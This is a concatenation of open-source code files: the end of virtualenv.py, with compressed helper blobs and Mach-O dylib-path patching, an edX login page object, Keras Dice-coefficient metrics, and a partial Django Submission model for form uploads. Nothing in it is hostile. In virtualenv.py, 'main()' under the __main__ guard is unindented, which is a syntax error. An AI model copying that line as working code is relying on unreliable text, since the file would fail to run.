2nkOVqs2X0TNjz/8eeFFle826fBhQRaLBkD9uviw+LCy3Sbq7Mb/UNbrH3+YNtLcVaB+Xbipb+eL
tly0eVsD/M6u6g8//vC+dquobH5VWU75eMFUdvHb4n02RHlXuHYTFfmHbHCLLLNz70NpN+GrBI4p
1EeSk4FAXaZR88u0vPip8usi7fznt3fvP+OuPnx49/Pil4td+XnzigIAPoqYQH2J8v4z+C+8b98m
Q25t7k76LIK0cOz0V89/MXXx0+Lf6z5q3PA/F+/FIif9uqnaadFf/PzXSXYBfqIb2NeApecJwPzI
dlL/149nnvyoc7KqYfzTAT8v/voUmX7e+3n364tffl/oVaDyswKY/7J18e6bve8Wv9RuUfqfLHmK
/u139Hwx+9ePRep97KKqae30YwmCo2y+0vTz1k+rv7159B3pb1SOGj97Pe8/flfkC1Vn/7xYR4n6
lypNEGDDV5f7lcjil3S+4++p881Wv6qKyn5GQg1yJwcp4BZ5E+Wt/z1P/umbiHir4J8Xip/eFt6n
9T/9gU9eY+7zUX97Jlmb136ziKrKT/3OzpvP8VX/+MObSP0lL3LvVZlJ9v1b8357jXyw8rXxYPXN
11n4UzJ8G8S/vUbuJ6RPj999DbtS5kys//JusXwrNLnvT99cFlBNwXCe+niRz8JF/ezNr9Pze+H6
18W7d5PPvozW7+387Zto/v4pL8BvbxTzvIW9KCv/Fj0WzVQb/YXbVlPZWTz3/9vCaRtQbPN/Bb+j
2rUrDxTVD68gfQXu/ZewAFX53U/vf/rD2P3558W7+W79Po1y/xXoX/6RFHyNIoVjgAG4H0RTcAe5
3bSVv3DSwk2mZYHjFB8zj6fC4sLOFTHJJQrwzFYJgso0ApOoBzFiRzzQKjIQCCbQMIFJGCKqGUyS
8AkjiF2wTwmMEbcEUvq8Nj+X0f4YcCQmYRiOY7eRbAJDqzm1chOoNstbJ8oTBhZQ2NcfgaB6QjLp
U4+SWFjQGCZpyqby8V4JkPGs9eH1BscXIrTG24QxXLIgCLYNsIlxSYLA6SjAeg7HAg4/kpiIB8k9
TCLm0EM4gKIxEj8IUj2dQeqSxEwYVH88qiRlCLjEYGuNIkJB1BA5dHOZdGAoUFk54WOqEojkuf4Q
Ig3WY+96TDlKLicMC04h0+gDCdYHj0kz2xBDj9ECDU5zJ0tba6RKgXBneewhBG/xJ5m5FX+WSzsn
wnHvKhcOciw9NunZ0BUF0n0IJAcJMdcLqgQb0zP19dl8t9PzmMBjkuIF7KkvHgqEovUPOsY0PBB1
HCtUUhch83qEJPjQcNQDsgj0cRqx2ZbnnlrlUjE1EX2wFJyyDa/0GLrmKDEFepdWlsbmVU45Wiwt
eFM6mfs4kxg8yc4YmKDy67dniLV5FUeO5AKNPZaOQQ++gh+dXE7dbJ1aTDr7S4WPd8sQoQkDyODg
XnEu/voeKRAXZxB/e2xaJ4LTFLPYEJ15Ltb87I45l+P6OGFA5F5Ix8A4ORV6M1NH1uMuZMnmFtLi
VpYed+gSq9JDBoHc05J4OhKetrk1p0LYiKipxLMe3tYS7c5V7O1KcPU8BJGdLfcswhoFCSGQqJ8f
ThyQKy5EWFtHVuNhvTnkeTc8JMpN5li3buURh0+3ZGuzdwM55kon+8urbintjdQJf9U1D0ah+hNh
i1XNu4fSKbTC5AikGEaj0CYM1dpuli7EoqUt7929f1plxGGNZnixFSFP2qzhlZMonu2bB9OWSqYx
VuHKWNGJI8kqUhMTRtk0vJ5ycZ60JlodlmN3D9XiEj/cG2lSt+WV3OtMgt1Tf4/Z+1BaCus740kx
Nvj78+jMd9tq537Xz/mNFyiHb0HdwHytJ3uQUzKkYhK7wjGtx3oKX43YeYoJVtqDSrCnQFzMemCS
2bPSvP+M4yZFi/iZhAjL4UOeMfa7Ex8HKBqw4umOCPh+imOP6yVTwG2MplB+wtg97olEtykNZ6wg
FJBNXSTJ3g0CCTEEMdUjjcaBDjhJ9fyINXgQVHhA0bjk9lhhhhOGzcqQSxYdj3iIN2xGEOODx4qj
Q2xikJudC1ujCVOtiRwhga5nPdhe1gSa649bLJ0wCuLMcEYIeSy25YcDQHJb95nfowv3rQnin0fE
zIXFkM/EwSGxvCCMgEPNcDp/wph1gMEa8Xd1qAWOwWZ/KhjlqzgisBpDDDXz9Cmov46GYBKHC4zZ
84HJnXoTxyWNBbXV4LK/r+OEwSN45zBp7Cub3gIYIvYlxon5BzDgtPUYfXAMPbENGrI+YVGSeTQ5
i8NMB5UCcC+YRGIBhgs0xhAGwSgYwywpbu4vpCSTdEKrsy8osXMUnHQYenQHbOBofLCNNTg3CRRj
A1nXY2MZcjnXI+oQ2Zk+561H4CqoW61tbPKv65Y7fqc3TDUF9CA3F3gM0e0JQ0TPADJFJXVzphpr
2FzwAY8apGCju1QGOiUVO5KV6/hKbtgVN6hRVwpRYtu+/OC6w2bCcGzZQ8NCc4WejNEjFxOIgR3o
QqR1ZK0IaUxZ9nbL7GWJIjxBARUhAMnYrq/S0tVOjzlOSYRqeIZxaSaOBX5HSR3MFekOXVdUPbjX
nru61fDwI8HRYPUS7a6Inzq9JLjokU6P6OzT4UCH+Nha+JrU4VqEo4rRHQJhVuulAnvFhYz5NWFT
aS/bKxW6J3e46y4PLagGrCDKcq5B9EmP+s1QMCaxHNeM7deGEV3WPn3CeKjndlygdPyoIcNaL3dd
bdqPs47frcZ3aNWQ2Tk+rjFR01Ul4XnQQB6CSKA+cZusD0CP3F2Ph0e78baybgioepG12luSpFXi
bHbI6rGLDsGEodMObDG7uyxfCeU+1OiyXYk8fnGu0SpbpRoEuWdSUlNi5bd9nBxYqZGrq7Qa7zV+
VLazLcelzzP9+n6+xUtWx9OVJZW3gk92XGGkstTJ/LreFVFF2feLpXGGuQqq6/1QbWPyhJXIXIMs
7ySVlzMYqoPmnmrobbeauMIxrCr3sM+qs5HpwmmFt7SM3aRNQWpCrmeAXY28EJ9uc966urGKBL9H
18MtDE5OX97GDOHxam11y5LCAzcwtkUu8wqWI1dWgHyxGZdY8mC3lXzbzncLZ2bIUxTD2yW7l9eY
gBUo7uj02ZI3ydUViL7oAVFag37JsjYG8o4Csc5R7SeONGF8yZP+7xxi9scnHvHPcogJ44VH/LMc
Yu6Vn3jEzCFw9Eqq1ENQAW8aqbUwSiAqi+nZ+OkZJKpBL66Bj8z+ATqb/8qDIJUeNRTwrI0YrVmb
9FArKVEbCWUNSi8ipfVv+STgkpSsUhcBg541eeKLoBpLGaiHTNoK0r4nn3tZqrcIULtq20Df+FVQ
Sa0MnWxTugMuzD410sQygF4qdntbswiJMqjs014Irz/tm+pd5oygJ0fcdNbMg165Pqi7EkYGAXcB
dwxioCDA3+BY9+JjuOmJu/xyX2GJtaKSQcOZxyqFzTaa6/ot21sez0BtKjirROKRm2zuai02L0N+
ULaX8H5P6VwsGPbYOY7sAy5FHBROMrMzFVPYhFHZ7M3ZCZa2hsT4jGow6TGtG8Nje9405uMUjdF4
PtKQjw6yZOmPUmO8LjFWS4aPCfE011N+l3EdYq09O3iQJ9a01B3KXiMF1WmtZ+l1gmyJ/ibAHZil
vQzdOl6g9PoSJ4TM4ghTnTndEVMOmsSSu+SCVlGCOLQRaw9oLzamSWP62VuxPZ77mZYdfTRGuNBi
KyhZL32S2YckO/tU7y4Bf+QKKibQSKCTDWPUwWaE8yCBeL5FjpbQuAlb53mGX1jptLeRotREbx96
gnicYz0496dYauCjpTCA4VA0cdLJewzRmZeTwuXWD0talJsSF9J1Pe72nkaHSpULgNeK1+o+9yi0
YpYwXZyvaZatK2eL0U0ZY6ekZkFPdC8JTF4Yo1ytawNfepqUKEhwznp6HO6+2l7L2R9Q3N49JMIe
Z+ax1mVaWussz98QbNTRPo1xu4W33LJpd9H14dd66ype7UktfEDi3oUTccJ4nODjwBKFxS7lYWiq
XoHu/b7ZVcK5TbRD0F/2GShg2ywwUl07k4LLqhofKxFBNd1grWY+Zt/cPtacBpV9ys2z1moMLrT3
W0Elrjtt5y/dvDQYtObYS97pqj0eqmwvD3jCPRqamGthLiF0XkgB6IdHLBBwDGPiIDh7oPaRmTrN
tYA/yQKFxRiok+jM6ciJq/ZgiOi5+W4DEmufPEubeSuYJaM3/JHEevM08yJAXUQwb9LS2+8FOfds
FfOe3Bel6EDSjIEIKs4o9tyt67L1ylQlzhe0Q+7ue/bJnWMcD3q6wDSIQi8ThnRM65aqLWesi/ZM
xhHmQvfKBbWcC194IPjbBLYR9JTPITbzwRcu+OSFHDHNSYCLt29sAHO6Gf0h/2UO9Xwvhrjhczyx
Ygz6CqP4IwxQj5694Q1Pe2IR+KF/yy+5PvCL/vgwv5mPp9n4kx7fnY/nmV++410qF/ZVCMyv5nAP
pkeOSce53yJ6ahF4aMJi52by1HcCj9mDT5i+7TF6RoPaLL+cN1hXem2DmX/mdIbeeqwQOLD5lKO/
6FM4x77w6D5wMx3g0IAfa2D/pgY9a7bFQbinLDPz5dZi9ATIrd0cB5xfC0BfCCZO7TKP0jQ2Meih
nRXhkA3smTAnDN9IW2vA++lsgNuZ2QP0UhqyjUPrDmgfWP2bWWiKA+YiEK7xou8cY0+d3/bk0oHR
QLrq4KzDYF/ljQDmNhBHtkVNuoDey6TTeaD3SHO/Bf4d3IwGdqQp6FuhmwFbmbQBssDXVKDBYOpk
Jy7wxOaSRwr0rDmGbsFdCM+7XU/84JPu3D/gW7QXgzlvbjixn99/8CpWFUQWHFEz/RyXvzNXTTOd
OXLNNFc957Jn/YikNzEpUdRNxXcC6b76ccTwMGoKj5X7c7TvHFgc3Tf4892+5A+iR+D8OaaE6ACe
gdgHcyCoPm/xiDCWP+OZRjpzfj5/2u0i4qQfmIEOsTV9Hw6jZ3Agnh6hiwjDtGYxWvt5TiWEuabN
77YCyRXwO8P8wdzG/8489KwfFBZWI6Vvx76gmlOc03JI1HEfXYZEL4sNFQ3+bqf7e2hdSWQknwKF
ICJjGyDs3fdmnnxubKXebpQYLjPgEt9GTzKkUgTvOoQa1J7N3nv4sR6uvYFLhkXZ+pbCoU3K9bfq
gF7W82tNutRRZExad+k4GYYsCfmEbvizS4jsRr3fdzqjEthpEwm7pmN7OgVzRbrktjrFw1lc0vM8
V7dyTJ71qlsd7v3KhmHzeJB35pqEOk2pEe5uPeCToNkmedmxcKbIj+MZzjFSsvCmimaMQB1uJJKa
+hoWUi7aEFLvIxKxJavqpggXBIk2hr0608dIgnfG5ZEprqmH0b0YSy6jVXTCuIB+WER4d5BPVy9Q
M4taX0RIlDYxQ2CjBuq78AAcHQf5qoKP8BXHnDnd/+ed5fS+csL4g3eWqECaL+8suy9r8hx7c+4L
EegEWdqAWN1w1NezP34xsxLkvRRI0DRzKOg0U+BKfQY128YlYsbwSczEg2LqKxRmcgiwHdhc9MQJ
IwKQHlgBejWeMGDYYxTOQUiJOmIjJbzIzHH6lAMP+y/fR0v1g4wx4St8fcqTt3gz5wc+xXFZZ3qI
JpXI5iJk7xmNL2tYsDpcqu0375Snd5EKsIvg8u5szTOyZ4v06Ny2TZXRpHUSinh4IFp8Eoi7GINJ
02lPJnS/9jSxolJwp2slPMIEbjleWw3eec4XaetyEnSSqTPRZ9fVA0cPXMqzrPYQQyrRux3LaAh1
wujbgcObg1nt4iiJ5IMbc/WNPc280I2T4nTkdwG8H6iS5xO2WfsFsruBwf2QkgZlb6w7om2G65Lr
r2Gl4dk63F8rCEHoUJ3fW+pU2Srjlmcbp+JXY3DMifEI22HcHAvT7zzXiMTr7VbUR5a2lZtJkk4k
1heZZFdru8ucCWMTr3Z4eNnjLm7LW7rcN7QjMpxrsCzjxndeyFUX7deIs3PQkgyH8k6luI0uUyLr
va47TBjM4JmNHFzGPcP6BV6cYgQy8VQYZe5GmzZHMxyBYhGiUdekZQ/qwyxC3WGylQGdUpSf9ZCP
a7qPdJd31fPRC0TOgzupO7nLuBGr2A02yuUQwt2KQG31sW8Gd9tQiHq+hPDt4OzJuY4pS8XRsepY
tsd7dVEfJFmc15IYqwHverrpWyS1rFZibDPW1hUUb+85CGUzSBSTK8hpvee/ZxonW51TUXekMy3L
uy25tMTg4mqbSLQQJ+skiQu2toIfBFYrOWql+EQipgfT15P1aq6FDK3xgSjIGWde0BPftYchDTdM
i4QdudHFkN0u6fSKiT09QLv2mtSblt5nNzBR6UReePNs+khE4rHcXuoK21igUKHl1c3MXMgPu7y8
rKQDxR6N/rffXv+lROXet/9Q+l9I4D1U
""")
##file distutils-init.py
DISTUTILS_INIT = convert("""
eJytV1uL4zYUfvevOE0ottuMW9q3gVDa3aUMXXbLMlDKMBiNrSTqOJKRlMxkf33PkXyRbGe7Dw2E
UXTu37lpxLFV2oIyifAncxmOL0xLIfcG+gv80x9VW6maw7o/CANSWWBwFtqeWMPlGY6qPjV8A0bB
C4eKSTgZ5LRgFeyErMEeOBhbN+Ipgeizhjtnhkn7DdyjuNLPoCS0l/ayQTG0djwZC08cLXozeMss
aG5EzQ0IScpnWtHSTXuxByV/QCmxE7y+eS0uxWeoheaVVfqSJHiU7Mhhi6gULbOHorshkrEnKxpT
0n3A8Y8SMpuwZx6aoix3ouFlmW8gHRSkeSJ2g7hU+kiHLDaQw3bmRDaTGfTnty7gPm0FHbIBg9U9
oh1kZzAFLaue2R6htPCtAda2nGlDSUJ4PZBgCJBGVcwKTAMz/vJiLD+Oin5Z5QlvDPdulC6EsiyE
NFzb7McNTKJzbJqzphx92VKRFY1idenzmq3K0emRcbWBD0ryqc4NZGmKOOOX9Pz5x+/l27tP797c
f/z0d+4NruGNai8uAM0bfsYaw8itFk8ny41jsfpyO+BWlpqfhcG4yxLdi/0tQqoT4a8Vby382mt8
p7XSo7aWGdPBc+b6utaBmCQ7rQKQoWtAuthQCiold2KfJIPTT8xwg9blPumc+YDZC/wYGdAyHpJk
vUbHbHWAp5No6pK/WhhLEWrFjUwtPEv1Agf8YmnsuXUQYkeZoHm8ogP16gt2uHoxcEMdf2C6pmbw
hUMsWGhanboh4IzzmsIpWs134jVPqD/c74bZHdY69UKKSn/+KfVhxLgUlToemayLMYQOqfEC61bh
cbhwaqoGUzIyZRFHPmau5juaWqwRn3mpWmoEA5nhzS5gog/5jbcFQqOZvmBasZtwYlG93k5GEiyw
buHhMWLjDarEGpMGB2LFs5nIJkhp/nUmZneFaRth++lieJtHepIvKgx6PJqIlD9X2j6pG1i9x3pZ
5bHuCPFiirGHeO7McvoXkz786GaKVzC9DSpnOxJdc4xm6NSVq7lNEnKdVlnpu9BNYoKX2Iq3wvgh
gGEUM66kK6j4NiyoneuPLSwaCWDxczgaolEWpiMyDVDb7dNuLAbriL8ig8mmeju31oNvQdpnvEPC
1vAXbWacGRVrGt/uXN/gU0CDDwgooKRrHfTBb1/s9lYZ8ZqOBU0yLvpuP6+K9hLFsvIjeNhBi0KL
MlOuWRn3FRwx5oHXjl0YImUx0+gLzjGchrgzca026ETmYJzPD+IpuKzNi8AFn048Thd63OdD86M6
84zE8yQm0VqXdbbgvub2pKVnS76icBGdeTHHXTKspUmr4NYo/furFLKiMdQzFjHJNcdAnMhltBJK
0/IKX3DVFqvPJ2dLE7bDBkH0l/PJ29074+F0CsGYOxsb7U3myTUncYfXqnLLfa6sJybX4g+hmcjO
kMRBfA1JellfRRKJcyRpxdS4rIl6FdmQCWjo/o9Qz7yKffoP4JHjOvABcRn4CZIT2RH4jnxmfpVG
qgLaAvQBNfuO6X0/Ux02nb4FKx3vgP+XnkX0QW9pLy/NsXgdN24dD3LxO2Nwil7Zlc1dqtP3d7/h
kzp1/+7hGBuY4pk0XD/0Ao/oTe/XGrfyM773aB7iUhgkpy+dwAMalxMP0DrBcsVw/6p25+/hobP9
GBknrWExDhLJ1bwt1NcCNblaFbMKCyvmX0PeRaQ=
""")
##file distutils.cfg
DISTUTILS_CFG = convert("""
eJxNj00KwkAMhfc9xYNuxe4Ft57AjYiUtDO1wXSmNJnK3N5pdSEEAu8nH6lxHVlRhtDHMPATA4uH
xJ4EFmGbvfJiicSHFRzUSISMY6hq3GLCRLnIvSTnEefN0FIjw5tF0Hkk9Q5dRunBsVoyFi24aaLg
9FDOlL0FPGluf4QjcInLlxd6f6rqkgPu/5nHLg0cXCscXoozRrP51DRT3j9QNl99AP53T2Q=
""")
##file activate_this.py
ACTIVATE_THIS = convert("""
eJyNU01v2zAMvetXEB4K21jnDOstQA4dMGCHbeihlyEIDMWmE62yJEiKE//7kXKdpEWLzYBt8evx
kRSzLPs6wiEoswM8YdMpjUXcq1Dz6RZa1cSiTkJdr86GsoTRHuCotBayiWqQEYGtMCgfD1KjGYBe
5a3p0cRKiEe2NtLAFikftnDco0ko/SFEVgEZ8aRCZDIPY9xbA8pE9M4jfW/B2CjiHq9zbJVZuOQq
siwTIvpxKYCembPAU4Muwi/Z4zfvrZ/MXipKeB8C+qisSZYiWfjJfs+0/MFMdWn1hJcO5U7G/SLa
xVx8zU6VG/PXLXvfsyyzUqjeWR8hjGE+2iCE1W1tQ82hsCJN9dzKaoexyB/uH79TnjwvxcW0ntSb
yZ8jq1Z5Q1UXsyy3gf9nbjTEj7NzQMfCJa/YSmrQ+2D/BqfiOi6sclrGzvoeVivIj8rcfcmnIQRF
7XCyeZI7DFe5/lhlCs5PRf5QW66VXT/NrlQ46oD/D6InkOmi3IQcbhKxAX2g4a+Xd5s3UtCtG2py
m8eg6WYWqR6SL5OjKMGfSrYt/6kxxQtOpeAgj1LXBNmpE2ElmCSIy5H0zFd8gJ924HWijWhb2hRC
6wNEm1QdDZtuSZcEprIUBo/XRNcbQe1OUbQ/r3hPTaPJJDNtFLu8KHV5XoNr3Eo6h6YtOKw8e8yw
VF5PnJ+ts3a9/Mz38RpG/AUSzYUW
""")
# Mach-O header magic numbers (32-/64-bit, both byte orders), used by
# mach_o_change()/do_file() below to identify the binary's format.
MH_MAGIC = 0xfeedface
MH_CIGAM = 0xcefaedfe
MH_MAGIC_64 = 0xfeedfacf
MH_CIGAM_64 = 0xcffaedfe
# Magic number of a "fat" (multi-architecture) binary.
FAT_MAGIC = 0xcafebabe
# struct byte-order prefixes used with read_data().
BIG_ENDIAN = '>'
LITTLE_ENDIAN = '<'
# Load-command id of LC_LOAD_DYLIB entries in a Mach-O command list.
LC_LOAD_DYLIB = 0xc
# Largest native int: sys.maxsize on Python 3, sys.maxint on Python 2.
# NOTE(review): ``majver`` is defined earlier in the file -- presumably the
# running interpreter's major version; confirm when viewing the whole file.
maxint = majver == 3 and getattr(sys, 'maxsize') or getattr(sys, 'maxint')
class fileview(object):
    """
    A proxy for file-like objects that exposes a given view of a file.
    Modified from macholib.

    The view is the byte window ``[start, start + size)`` of the
    underlying file; ``tell()``/``seek()`` positions are relative to
    ``start`` and every access is bounds-checked against the window.
    """
    def __init__(self, fileobj, start=0, size=maxint):
        # Unwrap nested fileviews so we always proxy the real file object.
        if isinstance(fileobj, fileview):
            self._fileobj = fileobj._fileobj
        else:
            self._fileobj = fileobj
        self._start = start
        self._end = start + size
        self._pos = 0
    def __repr__(self):
        return '<fileview [%d, %d] %r>' % (
            self._start, self._end, self._fileobj)
    def tell(self):
        # Position relative to the start of the window, not the file.
        return self._pos
    def _checkwindow(self, seekto, op):
        # ``seekto`` is an absolute file offset; both window edges are
        # allowed (<=), so seeking exactly to the end is legal.
        if not (self._start <= seekto <= self._end):
            raise IOError("%s to offset %d is outside window [%d, %d]" % (
                op, seekto, self._start, self._end))
    def seek(self, offset, whence=0):
        # Translate the window-relative seek into an absolute offset.
        seekto = offset
        if whence == os.SEEK_SET:
            seekto += self._start
        elif whence == os.SEEK_CUR:
            seekto += self._start + self._pos
        elif whence == os.SEEK_END:
            seekto += self._end
        else:
            raise IOError("Invalid whence argument to seek: %r" % (whence,))
        self._checkwindow(seekto, 'seek')
        self._fileobj.seek(seekto)
        self._pos = seekto - self._start
    def write(self, bytes):
        # Validate both ends of the write before touching the file so an
        # out-of-window write fails without producing partial output.
        here = self._start + self._pos
        self._checkwindow(here, 'write')
        self._checkwindow(here + len(bytes), 'write')
        self._fileobj.seek(here, os.SEEK_SET)
        self._fileobj.write(bytes)
        self._pos += len(bytes)
    def read(self, size=maxint):
        assert size >= 0
        here = self._start + self._pos
        self._checkwindow(here, 'read')
        # Clamp the read so it never crosses the end of the window.
        size = min(size, self._end - here)
        self._fileobj.seek(here, os.SEEK_SET)
        bytes = self._fileobj.read(size)
        self._pos += len(bytes)
        return bytes
def read_data(file, endian, num=1):
    """
    Read a given number of 32-bits unsigned integers from the given file
    with the given endianness.

    Returns a single int when ``num`` is 1, otherwise a tuple of ints.
    """
    values = struct.unpack(endian + 'L' * num, file.read(num * 4))
    if len(values) == 1:
        return values[0]
    return values
def mach_o_change(path, what, value):
    """
    Replace a given name (what) in any LC_LOAD_DYLIB command found in
    the given binary with a new name (value), provided it's shorter.

    ``path`` is opened in-place ('r+b'); thin 32/64-bit Mach-O files and
    fat (multi-arch) binaries are both handled.  The replacement must not
    be longer than the original (asserted below); the new name is written
    NUL-terminated, so any trailing bytes of a longer old name are simply
    left behind after the NUL.
    """
    def do_macho(file, bits, endian):
        # Read Mach-O header (the magic number is assumed read by the caller)
        cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags = read_data(file, endian, 6)
        # 64-bits header has one more field.
        if bits == 64:
            read_data(file, endian)
        # The header is followed by ncmds commands
        for n in range(ncmds):
            where = file.tell()
            # Read command header
            cmd, cmdsize = read_data(file, endian, 2)
            if cmd == LC_LOAD_DYLIB:
                # The first data field in LC_LOAD_DYLIB commands is the
                # offset of the name, starting from the beginning of the
                # command.
                name_offset = read_data(file, endian)
                file.seek(where + name_offset, os.SEEK_SET)
                # Read the NUL terminated string
                load = file.read(cmdsize - name_offset).decode()
                load = load[:load.index('\0')]
                # If the string is what is being replaced, overwrite it.
                if load == what:
                    file.seek(where + name_offset, os.SEEK_SET)
                    file.write(value.encode() + '\0'.encode())
            # Seek to the next command
            file.seek(where + cmdsize, os.SEEK_SET)
    def do_file(file, offset=0, size=maxint):
        # Work through a bounds-checked window so fat-binary members can't
        # read past their own slice.
        file = fileview(file, offset, size)
        # Read magic number
        magic = read_data(file, BIG_ENDIAN)
        if magic == FAT_MAGIC:
            # Fat binaries contain nfat_arch Mach-O binaries
            nfat_arch = read_data(file, BIG_ENDIAN)
            for n in range(nfat_arch):
                # Read arch header
                cputype, cpusubtype, offset, size, align = read_data(file, BIG_ENDIAN, 5)
                # Recurse into each embedded architecture slice.
                do_file(file, offset, size)
        elif magic == MH_MAGIC:
            do_macho(file, 32, BIG_ENDIAN)
        elif magic == MH_CIGAM:
            do_macho(file, 32, LITTLE_ENDIAN)
        elif magic == MH_MAGIC_64:
            do_macho(file, 64, BIG_ENDIAN)
        elif magic == MH_CIGAM_64:
            do_macho(file, 64, LITTLE_ENDIAN)
    # In-place overwrite only works if the new name fits where the old one was.
    assert(len(what) >= len(value))
    do_file(open(path, 'r+b'))
if __name__ == '__main__':
main()
## TODO:
## Copy python.exe.manifest
## Monkeypatch distutils.sysconfig
| yougov/yg-buildpack-python2-gulp | vendor/virtualenv-13.1.2/virtualenv.py | Python | mit | 99,421 |
"""Login and Registration pages (2)"""
from bok_choy.page_object import unguarded
from .login_and_register import CombinedLoginAndRegisterPage as EdXCombinedLoginAndRegisterPage
class CombinedLoginAndRegisterPage(EdXCombinedLoginAndRegisterPage):
    """
    Page object for the combined login/registration flow, extending the
    stock edX page with an activation-notice accessor.
    """
    def __init__(self, browser, start_page="register", course_id=None):
        """
        Set up the page, delegating all state to the edX base class.
        """
        super(CombinedLoginAndRegisterPage, self).__init__(browser, start_page, course_id)
    @unguarded
    def register_complete_message(self):
        """Get the message displayed to the user on the login form"""
        notice = self.q(css=".activate-account-notice h4")
        if notice.visible:
            return notice.text[0]
| nttks/edx-platform | common/test/acceptance/pages/lms/ga_login_and_register.py | Python | agpl-3.0 | 797 |
from functools import partial
from keras import backend as K
def dice_coefficient(y_true, y_pred, smooth=1.):
    """Soft Dice coefficient between two tensors, flattened to 1-D.

    ``smooth`` is added to numerator and denominator to avoid division
    by zero when both tensors are empty/all-zero.
    """
    true_flat = K.flatten(y_true)
    pred_flat = K.flatten(y_pred)
    overlap = K.sum(true_flat * pred_flat)
    return (2. * overlap + smooth) / (K.sum(true_flat) + K.sum(pred_flat) + smooth)
def dice_coefficient_loss(y_true, y_pred):
    """Negated Dice coefficient, usable as a Keras loss (lower is better)."""
    score = dice_coefficient(y_true, y_pred)
    return -score
def weighted_dice_coefficient(y_true, y_pred, axis=(-3, -2, -1), smooth=0.00001):
    """
    Weighted dice coefficient. Default axis assumes a "channels first" data structure
    :param smooth: stabilizer added to numerator (halved) and denominator
    :param y_true: ground-truth tensor
    :param y_pred: prediction tensor
    :param axis: spatial axes to reduce before averaging per channel
    :return: mean per-channel dice score
    """
    intersection = K.sum(y_true * y_pred, axis=axis)
    denominator = K.sum(y_true, axis=axis) + K.sum(y_pred, axis=axis) + smooth
    return K.mean(2. * (intersection + smooth / 2) / denominator)
def weighted_dice_coefficient_loss(y_true, y_pred):
    """Negated weighted Dice coefficient, usable as a Keras loss."""
    score = weighted_dice_coefficient(y_true, y_pred)
    return -score
def label_wise_dice_coefficient(y_true, y_pred, label_index):
    """Dice coefficient restricted to one label channel (channels-first layout)."""
    true_channel = y_true[:, label_index]
    pred_channel = y_pred[:, label_index]
    return dice_coefficient(true_channel, pred_channel)
def get_label_dice_coefficient_function(label_index):
    """Build a per-label dice metric for the given channel index.

    The returned callable is named ``label_<i>_dice_coef`` so each label's
    score shows up under a distinct name in training logs.
    """
    f = partial(label_wise_dice_coefficient, label_index=label_index)
    # Direct attribute assignment is the idiomatic form of the original
    # f.__setattr__('__name__', ...).
    f.__name__ = 'label_{0}_dice_coef'.format(label_index)
    return f
# Short aliases for the functions above.
dice_coef = dice_coefficient
dice_coef_loss = dice_coefficient_loss
| ellisdg/3DUnetCNN | legacy/unet3dlegacy/metrics.py | Python | mit | 1,508 |
import uuid
import settings
import email
import logging
import string
import hashlib
import sys
import os
import traceback
from django.utils import simplejson
from random import choice
from datetime import datetime
from django.db import models
from django.db.models.signals import post_save
from django.utils.translation import ugettext_lazy as _
from django.core import serializers
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from hq.models import *
from domain.models import Domain
from hq.utils import build_url
# Attachment uri that marks the xform payload of a submission
# (checked by Submission.xform below).
_XFORM_URI = 'xform'
# NOTE(review): the two identifiers below are not referenced in this
# portion of the module -- presumably handling-type names used elsewhere;
# confirm against the rest of the file.
_DUPLICATE_ATTACHMENT = "duplicate_attachment"
_RECEIVER = "receiver"
class Submission(models.Model):
    '''A Submission object. Represents an instance of someone POST-ing something
    to our site.'''
    submit_time = models.DateTimeField(_('Submission Time'), default = datetime.utcnow)
    # BUG FIX: pass the callable itself so a fresh UUID is generated for each
    # new row.  The original ``default=uuid.uuid1()`` was evaluated once at
    # import time, giving every Submission the same transaction id.
    transaction_uuid = models.CharField(_('Submission Transaction ID'), max_length=36, default=uuid.uuid1)
    domain = models.ForeignKey(Domain, null=True)
    submit_ip = models.IPAddressField(_('Submitting IP Address'))
    checksum = models.CharField(_('Content MD5 Checksum'),max_length=32)
    bytes_received = models.IntegerField(_('Bytes Received'))
    content_type = models.CharField(_('Content Type'), max_length=100)
    raw_header = models.TextField(_('Raw Header'))
    # Raw string for the match regex avoids the invalid '\.' escape warning.
    raw_post = models.FilePathField(_('Raw Request Blob File Location'), match=r'.*\.postdata$', path=settings.RAPIDSMS_APPS['receiver']['xform_submission_path'], max_length=255, null=True)
    authenticated_to = models.ForeignKey(User, null=True)
class Meta:
get_latest_by = 'submit_time'
@property
def num_attachments(self):
return Attachment.objects.all().filter(submission=self).count()
@property
def xform(self):
'''Returns the xform associated with this, defined by being the
first attachment that has a content type of text/xml. If no such
attachments are found this will return nothing.
'''
attachments = self.attachments.order_by("id")
for attachment in attachments:
# we use the uri because the content_type can be either 'text/xml'
# (if coming from a phone) or 'multipart/form-data'
# (if coming from a webui)
if attachment.attachment_uri == _XFORM_URI:
return attachment
return None
class Meta:
ordering = ('-submit_time',)
verbose_name = _("Submission Log")
get_latest_by = "submit_time"
def __unicode__(self):
return "Submission " + unicode(self.submit_time)
def delete(self, **kwargs):
if self.raw_post is not None and os.path.exists(self.raw_post) and os.path.isfile(self.raw_post):
os.remove(self.raw_post)
else:
logging.warn("Raw post not found on file system.")
attaches = Attachment.objects.all().filter(submission = self)
if len(attaches) > 0:
for attach in attaches:
attach.delete()
super(Submission, self).delete()
def handled(self, handle_type, message=""):
"""Mark the submission as being handled in the way that is passed in.
Returns the SubmissionHandlingOccurrence that is created."""
return SubmissionHandlingOccurrence.objects.create(submission=self,
handled=handle_type,
message=message)
def unhandled(self, handle_type):
""" Deletes the 'handled' reference (used when data is deleted) """
try:
SubmissionHandlingOccurrence.objects.get(submission=self, \
handled=handle_type).delete()
except SubmissionHandlingOccurrence.DoesNotExist:
return
def is_orphaned(self):
"""Whether the submission is orphaned or not. Orphanage is defined
by having no information about the submission being handled. This
explicitly should never include something that's a duplicate, since
all dupes are explicitly logged as handled by this app.
"""
# this property will be horribly inaccurate until we clear and resubmit everything
# in our already-deployed servers
return len(SubmissionHandlingOccurrence.objects.filter(submission=self)) == 0
def is_deleted(self):
'''Whether this has has been explicitly marked as deleted
in any handling app.
'''
all_delete_types = SubmissionHandlingType.objects.filter(method="deleted")
return len(self.ways_handled.filter(handled__in=all_delete_types)) > 0
def is_duplicate(self):
"""Whether the submission is a duplicate or not. Duplicates
mean that at least one attachment from the submission was
the exact same (defined by having the same md5) as a previously
seen attachment."""
# TODO: There's two ways to do this: one relies on the post_save event to
# populate the handlers correctly. The other would just call is_duplicate
# on all the attachments. I think either one would be fine, but since
# one will work pre-migration while one will only work post migration
# I'm TEMPORARILY going with the one that walks the attachments.
# This is miserably slow (doing a full table scan for every submit) so
# should really move as soon as we migrate.
# Correct implementation commented out until migration
